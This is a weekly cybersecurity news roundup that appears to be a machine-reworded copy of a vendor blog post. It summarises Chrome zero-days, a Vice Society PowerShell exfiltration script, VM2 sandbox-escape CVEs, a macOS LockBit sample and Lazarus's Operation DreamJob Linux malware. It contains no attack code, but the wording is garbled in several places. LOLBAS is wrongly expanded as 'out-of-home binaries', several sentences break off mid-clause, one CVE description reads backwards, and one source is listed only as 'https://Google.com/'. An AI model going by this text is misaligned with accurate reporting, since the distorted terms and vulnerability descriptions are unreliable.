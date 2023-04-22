



Time to Patch | Google Warns of First Two Zero-Day Vulnerabilities of 2023

Google has released emergency patches for two high-severity zero-day vulnerabilities affecting Chrome, CVE-2023-2136 and CVE-2023-2033. The latter is actively exploited. Google is now restricting access to details until a majority of Chrome’s 3 billion users apply a fix.

CVE-2023-2136 targets an integer overflow in Google’s Skia used in Chrome that allows sandbox escaping via a crafted HTML page if a remote attacker compromises the renderer process can. CVE-2023-2033 is a vulnerability that targets a confusion vulnerability in the Chrome V8 JavaScript engine. This type of flaw allows an attacker to cause the browser to crash by reading or writing out of bounds in memory. It can also be exploited to execute arbitrary code on vulnerable devices.

The latest version of the browser, v112.0.5615.137/138, contains a total of 8 fixes. The stable release is currently targeting Windows and Mac, with a Linux rollout coming soon.

Data Exfiltration | Vice Society Ransomware Gang Uses New Stealth PowerShell Tool

Notorious ransomware group Vice Society runs fairly sophisticated PowerShell scripts to automate data theft from compromised networks. This new tool employs out-of-home binaries and scripts (LOLBAS) designed to evade alarms from security software used by targeted parties to reach the encryption phase of the attack. .

Researchers first saw the tool earlier this year when the Vice Society used a script named w1.ps1 referenced in a Script Block logging event to exfiltrate data from a victim’s network. It was time This script automates the data exfiltration process through multiple functions and identifies vulnerable directories that can exfiltrate data via HTTP POST requests to the Vice Society servers.

Overview of Script Functionality (Source: Unit 42)

Threat actors often use stolen corporate and customer data to extort higher ransoms from victims and resell it to other criminals for additional profit. Vice Society’s latest script shows signs of further evolution since it debuted PolyVice, a new file encryption tool, in December 2022.

Critical RCE Flaw | Sandbox escape PoC available in VM2 JavaScript library

Recently, three sandbox escape proof-of-concept (POC) exploits were released. All of these exploits allow an attacker to execute malicious code on the host running her VM2. A specialized JavaScript sandbox, VM2 is commonly used by penetration testing frameworks and code editors to run and test untrusted code in isolation. All three defects are assigned a critical score of 9.8.

CVE-2023-29017 describes a case where VM2 does not properly handle host objects passed to Error.prepareStackTrace during unhandled asynchronous errors. This could be used by an attacker to gain remote code execution privileges. CVE-2023-29199 affects VM2’s source code transformer. When exploited, an attacker can bypass sandbox protections and gain remote code execution privileges on the host running the sandbox. CVE-2023-30547 prevents the handleException() function from sanitizing sandboxed exceptions. By circumventing these sandbox restrictions, attackers can execute arbitrary code on the host and launch serious cyberattacks.

VM2 strongly recommends all users and developers using the VM2 library to upgrade to version 3.9.17 to address the security flaw.

LockBit Ransomware | macOS Variant Surface New and Incomplete Samples

Researchers this week revealed details of a LockBit ransomware sample compiled for Apple’s macOS arm64 architecture. To date, there have been no reports of LockBit for Mac being exploited in the wild, and there are no associated distribution methods.

The sample discovered uses “test” as a hard-coded password for execution, leading to speculation that the threat is in development. Researchers have found that the Mac variant is a direct descendant of the Linux version and reuses much of the same code. Additionally, the Mac variant does not appear to be able to exfiltrate locked data and has not been shown to have a persistence method.

A breakdown of variants indicates that there are currently no credible threats to Mac endpoints yet. While the sample is in its infancy, a LockBit spokesperson said development of a Mac ransomware payload is an active project, and a more effective payload targeting Apple Mac devices may not be far away. is raising concerns.

Operation Dream Job | Tools Contained in Linux Malware Found Linked to 3CX Supply Chain Attack

The long-running campaign Operation DreamJob, led by the Lazarus group, has been confirmed to target Linux for the first time this week. Using social engineering techniques to target job seekers on various platforms, victims are tricked into downloading malicious files masquerading as files containing job postings.

After dropping the malware on the victim’s device, a ZIP containing Linux libraries written in Go is distributed disguised as a PDF file, prompting the victim to double-click to launch the OdicLoader malware. A second stage C++ backdoor called SimplexTea is then launched.

Diagram of a possible compromise chain (Source: Welive Security)

The use of this backdoor and other common artifacts has led researchers to link Operation DreamJob to Smooth Operator, a recent supply chain attack against VoIP provider 3CX. The 3CX attack has received significant attention from the cyber defense community over the past four weeks. It is the most serious of the supply chain attacks on the rise.

This Linux-based malware attack attributed to Lazarus is evidence that threat actors continue to expand their arsenal and tactics, expanding malware variants to target more systems than ever before.

Sources 1/ https://Google.com/ 2/ https://www.sentinelone.com/blog/the-good-the-bad-and-the-ugly-in-cybersecurity-week-16-4/

